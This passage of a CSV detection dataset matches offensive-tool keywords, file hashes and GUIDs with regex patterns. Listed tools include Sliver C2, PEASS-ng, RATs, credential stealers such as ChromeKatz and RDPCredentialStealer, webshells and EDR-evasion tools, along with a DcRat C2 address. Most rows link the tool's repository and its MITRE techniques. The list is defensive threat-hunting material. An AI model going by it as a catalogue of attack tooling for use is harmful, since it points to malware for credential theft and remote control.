- Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","21932" "*10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af*",".{0,1000}10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21933" "*10k-worst-pass.txt*",".{0,1000}10k\-worst\-pass\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","21934" "*110065fdfaa8e7ef46a45506982ae606af7d50b8d10fe008899b0a9abe4013b5*",".{0,1000}110065fdfaa8e7ef46a45506982ae606af7d50b8d10fe008899b0a9abe4013b5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21935" "*11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806*",".{0,1000}11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","21936" "*1106565073956253736/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1-Ig60Rh4P_TGFq-m*",".{0,1000}1106565073956253736\/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1\-Ig60Rh4P_TGFq\-m.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21937" "*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21938" "*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21939" "*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21940" "*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21942" "*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21943" "*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21944" "*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21945" "*1119pepesneakyevil*",".{0,1000}1119pepesneakyevil.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","21946" "*111BB935-2A0A-4AE2-AEB0-EF2FAA529840*",".{0,1000}111BB935\-2A0A\-4AE2\-AEB0\-EF2FAA529840.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21947" "*111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42*",".{0,1000}111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21948" "*112113a092929c5abc34a05a2d4c42f736a23ea7ef66c23b5e005586db1e2fe2*",".{0,1000}112113a092929c5abc34a05a2d4c42f736a23ea7ef66c23b5e005586db1e2fe2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21949" "*11350f8f9a6296d6c3d2e74857bd3d81d180134e4cb5320fc42795f6922c1a02*",".{0,1000}11350f8f9a6296d6c3d2e74857bd3d81d180134e4cb5320fc42795f6922c1a02.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - 
T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21951" "*11360c9e4f50a098a4abfc0d6c6d19b8fa73ca872c462dc4e9b3d6a24a5abb22*",".{0,1000}11360c9e4f50a098a4abfc0d6c6d19b8fa73ca872c462dc4e9b3d6a24a5abb22.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21952" "*11385CC1-54B7-4968-9052-DF8BB1961F1E*",".{0,1000}11385CC1\-54B7\-4968\-9052\-DF8BB1961F1E.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","21954" "*1138a233a5a8d32e0731281ff9acedc0d930998a243d3fe11151cbc226ceb5af*",".{0,1000}1138a233a5a8d32e0731281ff9acedc0d930998a243d3fe11151cbc226ceb5af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21955" "*1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9*",".{0,1000}1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21958" "*1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9*",".{0,1000}1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21959" "*1145c0adcdf15ea7ac30cb824c417b356f15722dc2039aa6a3ffe67c2cc3bbd0*",".{0,1000}1145c0adcdf15ea7ac30cb824c417b356f15722dc2039aa6a3ffe67c2cc3bbd0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21960" "*1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5*",".{0,1000}1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21961" "*115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461*",".{0,1000}115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21962" "*115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17*",".{0,1000}115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21964" "*115ac6d10a371a9f22cdf0190e84a5a4c4d5b4b625bf8d571d68f95b507424e5*",".{0,1000}115ac6d10a371a9f22cdf0190e84a5a4c4d5b4b625bf8d571d68f95b507424e5.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21965" "*1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98*",".{0,1000}1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21966" "*116472CE-3924-40EA-90F9-50A1A00D0EC5*",".{0,1000}116472CE\-3924\-40EA\-90F9\-50A1A00D0EC5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21967" 
"*11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b*",".{0,1000}11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21969" "*11802597962f345ac2b1c9cd161eee89862b153a06ec00c90b84889f5d094379*",".{0,1000}11802597962f345ac2b1c9cd161eee89862b153a06ec00c90b84889f5d094379.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21972" "*1182b15d8277fa6ea660c74b71599cb2417bdc28c889215514f414978a26a9d3*",".{0,1000}1182b15d8277fa6ea660c74b71599cb2417bdc28c889215514f414978a26a9d3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21973" 
"*1189360f7da03490a9f0f3ce283d487335a4db24232d6fabfd17bc7ec4e53392*",".{0,1000}1189360f7da03490a9f0f3ce283d487335a4db24232d6fabfd17bc7ec4e53392.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21974" "*118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db*",".{0,1000}118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","21975" "*118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db*",".{0,1000}118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","21976" "*118e93d0a030df314b4e592e9470c9ae9d6c40de1417714172a95891248a2365*",".{0,1000}118e93d0a030df314b4e592e9470c9ae9d6c40de1417714172a95891248a2365.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","21977" "*119.45.104.153:8848*",".{0,1000}119\.45\.104\.153\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21978" "*11a5d052cdb215ea23fad710c786f4b71f7a5c76f18d76d8fc97750ea4eaa403*",".{0,1000}11a5d052cdb215ea23fad710c786f4b71f7a5c76f18d76d8fc97750ea4eaa403.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21979" "*11a615149ed94d8057a6284d582f19d0b1f2c01a36f63f0b267cff32ba3bf06f*",".{0,1000}11a615149ed94d8057a6284d582f19d0b1f2c01a36f63f0b267cff32ba3bf06f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21980" "*11a92a7c6a84715416eb8a1c033a6a8db9a70494bfc08c9f09734e599be76cef*",".{0,1000}11a92a7c6a84715416eb8a1c033a6a8db9a70494bfc08c9f09734e599be76cef.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege 
Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","21982" "*11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe*",".{0,1000}11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21983" "*11b29c6bbbcb4bf9dc59b7b308de0da0f13e5f6116a3f10dffe76f4f927ccd8b*",".{0,1000}11b29c6bbbcb4bf9dc59b7b308de0da0f13e5f6116a3f10dffe76f4f927ccd8b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21984" "*11c1761a8b341699d52bc16698a43ea3193518818323307d82c41763893fbdd2*",".{0,1000}11c1761a8b341699d52bc16698a43ea3193518818323307d82c41763893fbdd2.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21988" "*11c46949df91b0ddef22dba8eef0767e316cc7829b4d41408da3bc21f1e07e48*",".{0,1000}11c46949df91b0ddef22dba8eef0767e316cc7829b4d41408da3bc21f1e07e48.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21989" "*11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937*",".{0,1000}11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21990" "*11cb4947c8f8e84c34512070b1ead707af5e948b82937f32e15df293269e678d*",".{0,1000}11cb4947c8f8e84c34512070b1ead707af5e948b82937f32e15df293269e678d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21991" "*11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048*",".{0,1000}11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash 
